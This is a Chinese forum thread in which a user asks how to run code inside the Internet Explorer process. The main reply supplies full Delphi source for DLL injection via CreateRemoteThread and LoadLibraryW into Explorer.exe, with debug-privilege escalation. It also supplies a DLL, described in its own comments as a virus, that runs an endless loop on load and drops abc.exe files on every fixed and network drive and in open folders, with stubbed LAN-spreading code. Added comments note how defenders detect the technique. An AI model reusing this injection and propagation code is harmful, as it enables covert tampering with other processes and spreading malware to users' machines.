如何将程序插入IE进程运行呢? ( 积分: 100 )


32881

如题,要求给出详细实现代码.谢谢.
 
如果你要做木马或病毒的话,全体大富翁都会鄙视你
 
http://dev.yesky.com/419/2016919.shtml
 
呜呼,只不过是兴趣罢了,没打算搞破坏.各位高手如果不愿意回答就算老..
稍后结贴吧..
主要想实现,,无DLL注入IE..呵呵..
 
还是用创建远程线程的方法,我做过的。
 
主程序
unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls, tlhelp32;
{type
TProcessEntry32 = record
dwSize: DWORD;
cntUsage: DWORD;
th32ProcessID: DWORD;
th32DefaultHeapID: DWORD;
th32ModuleID: DWORD;
cntThreads: DWORD;
th32ParentProcessID: DWORD;
pcPriClassBase: integer;
dwFlags: DWORD;
szExeFile: array[0..MAX_PATH - 1] of char;
end; }
type
// Minimal host form: a single button whose click handler (see
// TForm1.Button1Click in the implementation) triggers the injection.
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.DFM}

{ Walks a Toolhelp32 process snapshot and returns, in ProcessID, the PID of the
  first process whose image name matches AFilename; ProcessID stays 0 when
  nothing matched. PathMatch = True compares the full szExeFile string,
  otherwise only the base names are compared (both case-insensitively, via
  AnsiStriComp). }
procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
lppe: TProcessEntry32;
SsHandle: Thandle;
FoundAProc, FoundOK: boolean;
begin
ProcessID :=0;
// Snapshot of every process on the system.
SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);
FoundAProc := Process32First(Sshandle, lppe);
while FoundAProc do
begin
if PathMatch then
FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
else
FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
if FoundOK then
begin
// First match wins; later processes with the same name are ignored.
ProcessID := lppe.th32ProcessID;
break;
end;
FoundAProc := Process32Next(SsHandle, lppe);
end;
// The snapshot handle is released on every path, matched or not.
CloseHandle(SsHandle);
end;

{ Enables (bEnabled = True) or disables SeDebugPrivilege in the current
  process token. Returns True only when the token could be opened and
  GetLastError is ERROR_SUCCESS after AdjustTokenPrivileges; returns False
  when OpenProcessToken fails.
  Defender note: a process toggling SeDebugPrivilege immediately before
  touching another process's memory (see AttachToProcess) is a classic
  precursor that privilege-use auditing and EDR telemetry can surface. }
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
hToken: THandle;
tp: TOKEN_PRIVILEGES;
a: DWORD;
const
SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
Result := False;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
begin
tp.PrivilegeCount := 1;
// Return value of LookupPrivilegeValue is not checked here.
LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
if bEnabled then
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
tp.Privileges[0].Attributes := 0;
a := 0;
AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
// The outcome is read from GetLastError rather than the call's return value:
// AdjustTokenPrivileges can return TRUE while assigning nothing
// (ERROR_NOT_ALL_ASSIGNED).
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hToken);
end;
end;

{ Loads GuestFile (a DLL path) into another process using the well-known
  CreateRemoteThread + LoadLibraryW technique:
    1. enable SeDebugPrivilege in this process;
    2. resolve the target PID - PID when given, otherwise the first process
       whose base name matches HostFile (FindAProcess, base-name compare);
    3. OpenProcess with CREATE_THREAD, VM_OPERATION and VM_WRITE;
    4. VirtualAllocEx a read/write buffer in the target and write the
       wide-char DLL path into it;
    5. CreateRemoteThread with kernel32!LoadLibraryW as start address and the
       remote buffer as its argument, so the target loads the DLL.
  Returns the remote thread handle, or 0 when WriteProcessMemory failed.
  Defender note: this exact sequence - OpenProcess(VM_WRITE) -> VirtualAllocEx
  -> WriteProcessMemory -> CreateRemoteThread whose start address is
  LoadLibraryW - is the canonical DLL-injection pattern that EDR products and
  Sysmon (event 8, CreateRemoteThread) alert on, and the injected DLL then
  appears as an image load inside the host process. }
function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
hRemoteProcess: THandle;
dwRemoteProcessId: DWORD;
cb: DWORD;
pszLibFileRemote: Pointer;
iReturnCode: Boolean;
TempVar: DWORD;
pfnStartAddr: TFNThreadStartRoutine;
pszLibAFilename: PwideChar;
begin
Result := 0;
// Result of the privilege change is ignored.
EnabledDebugPrivilege(True);
// Local wide-char copy of the DLL path; this is what gets written remotely.
Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);
StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
if PID > 0 then
dwRemoteProcessID := PID
else
FindAProcess(HostFile, False, dwRemoteProcessID);
hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {allow creating a thread in the target}
PROCESS_VM_OPERATION + {allow VM operations in the target}
PROCESS_VM_WRITE, {allow writing the target's VM}
FALSE, dwRemoteProcessId);
// Byte count of the path including its terminating wide NUL.
cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);
pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));
TempVar := 0;
iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
if iReturnCode then
begin
// LoadLibraryW resolved in this process; kernel32 is assumed to sit at the
// same address in the target.
pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
TempVar := 0;
// The remote thread's sole job is LoadLibraryW(remote path).
Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
end;
Freemem(pszLibAFilename);
end;

{ Button handler: injects Project2.dll (located next to this executable) into
  the first process named Explorer.exe. Note the host here is Explorer.exe, not
  the IE process the thread title asks about; the thread handle returned by
  AttachToProcess is discarded. }
procedure TForm1.Button1Click(Sender: TObject);
begin
AttachToProcess('Explorer.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;

end.


dll
unit UnitDll;

interface

uses
SysUtils,
Classes,
Windows,
SHDocVw,
Activex,
PublicDef;

const
// Empty placeholder; not referenced anywhere in this unit.
MainFileName='';


var
// Handle and id of the worker thread started in the initialization section.
TransThreadHandle : Dword;
TransdwThreadID : DWord;

implementation

{ propagation thread }


{ Worker thread of the injected DLL (started from the initialization section
  below, i.e. as soon as the DLL is loaded into its host). It runs an endless
  loop that, every ~200 ms, calls TransFromRemoveDisk and then
  TransFromFilePath; exceptions from either are swallowed.
  Observable effects, from the code as written: an empty file named abc.exe is
  created at the root of every DRIVE_FIXED / DRIVE_REMOTE drive letter and
  inside every directory currently shown by a Shell/Explorer window. The
  nested ChangeFileAttrib and TransFromLAN routines are never called, and both
  'autorun file' branches are empty stubs (FileExists('') with an empty body).
  Defender note: the detection surface is a self-replicating DLL running a
  tight polling loop (with CoInitialize per thread) inside a host such as
  explorer.exe, plus zero-byte abc.exe artifacts at drive roots and in
  recently browsed folders. }
procedure TransThread;
// Never called from this unit; would mark FileName as hidden.
procedure ChangeFileAttrib(FileName:String);
begin
FileSetAttr(FileName,faHidden);
end;

{ For each drive letter a..z whose GetDriveType is DRIVE_FIXED or DRIVE_REMOTE,
  create an empty abc.exe at the drive root if one is not already there. Note
  the forward-slash separators ('x:/'). All errors are swallowed by the empty
  except blocks. }
procedure TransFromRemoveDisk;
var
I:Integer;
FileStream:TFileStream;
begin
try
for I:=Integer('a') to Integer('z') do
begin
try
case GetDriveType(pchar(chr(I)+':/')) of
DRIVE_FIXED,DRIVE_REMOTE :
begin
// does the 'virus' file already exist at the drive root
if Not FileExists(chr(I)+':/'+'abc.exe') then
begin
try
// Create and immediately close: the file is left empty (0 bytes).
FileStream:=TFileStream.Create(chr(I)+':/'+'abc.exe',fmcreate,fmOpenReadWrite);
finally
FreeAndNil(FileStream);
end;
end;

// does the autorun file exist (stub: empty name, empty body)
if Not FileExists('') then
begin
end;
end;
end;
except
end;
end;
except
end;
end;

{ Stub: the body is entirely commented out and the routine is never called
  from this unit. }
procedure TransFromLAN;
begin
// get the local LAN address
// loop over machines and check whether each can be spread to
{WnetAddConnection('//192.168.0.210/software','','Z:');
CopyFile('c:/a.wav','Z:/a.wav',false);
WnetCancelConnection('Z:',true); }
end;

{ Enumerates the Shell windows (CoShellWindows) and, for each one exposing
  IWebBrowser2, takes its LocationURL from character 9 onward (presumably
  dropping a 'file:///' prefix - not verified here) and, when that string is an
  existing directory, creates an empty abc.exe in it. A failure in Item() or
  an access violation in QueryInterface aborts the whole scan via exit. }
procedure TransFromFilePath;
var
ShellWindow: IShellWindows;
nCount: integer;
spDisp: IDispatch;
i: integer;
vi: OleVariant;
IE1: IWebBrowser2;
FileStream:TFileStream;
FileName:String;
begin
try

ShellWindow:=CoShellWindows.Create;
nCount := ShellWindow.Count;

for i := 0 to nCount - 1 do
begin
vi := i;
try
spDisp := ShellWindow.Item(vi);
except
// Any failure to fetch a window ends the scan (the finally block still runs).
exit
end;

if (spDisp <> nil) then
begin
try
spDisp.QueryInterface(iWebBrowser2, IE1);
except
on EAccessViolation do
begin
exit
end;
end;


if (IE1 <> nil) then
begin

// check whether the path exists; if so, copy the file there
if DirectoryExists(Copy(IE1.Get_LocationURL(),9,Length(IE1.Get_LocationURL)-9+1)) then
begin
// does the 'virus' file already exist
FileName:=Copy(IE1.Get_LocationURL()
,9
,Length(IE1.Get_LocationURL)-9+1)+'/abc.exe';

if Not FileExists(FileName) then
begin
try
// Create and immediately close: the file is left empty (0 bytes).
FileStream:=TFileStream.Create(FileName,fmcreate,fmOpenReadWrite);
finally
FreeAndNil(FileStream);
end;
end;

// does the autorun file exist (stub: empty name, empty body)
if Not FileExists('') then
begin
end;
end;
end;
end;
end;
finally
FreeAndNil(ShellWindow);
end;
end;

begin
CoInitialize(nil);
// Endless loop: nothing inside it breaks out, so the thread only ends when
// the finalization section calls TerminateThread and CoUninitialize below is
// never reached.
while true do
begin
try
{ infect the root of every hard disk }
TransFromRemoveDisk;
Sleep(200);
{ infect the directories currently open in Explorer windows }
TransFromFilePath;
sleep(200);
except
end;
end;
CoUninitialize;
end;

initialization
// Runs when the DLL is loaded: the worker thread starts immediately, so merely
// loading the DLL (e.g. via AttachToProcess in the host program) activates it.
TransThreadHandle:=CreateThread(nil, 0, @TransThread, nil, 0, TransdwThreadID);

finalization
// On unload the thread is killed outright with TerminateThread, without
// finishing its current step or reaching CoUninitialize.
if (TransThreadHandle <> 0) then
TerminateThread(TransThreadHandle,0);
end.
 
如果不是做病毒,楼主为何删除我的回复?
 
晕,楼上的代码有点吓人!
 
delhpi, 我有删你回复的权限吗?我不晓得,随便问问的.没人回答就算..一时兴趣,,值得你这么义愤吗?
 
晕,还真有人给代码,那种方法不是百发百中的,有很多限制,还有一种万无一失的方法,即把程序的权限提到ring 0,然后电脑中的进程你随便插,具体方法去看《黑客防线》04年合订本上册,至于代码,我是不会给你的,自己去找吧[:)]
 
楼主结贴吧!
 
不问了,算了.
 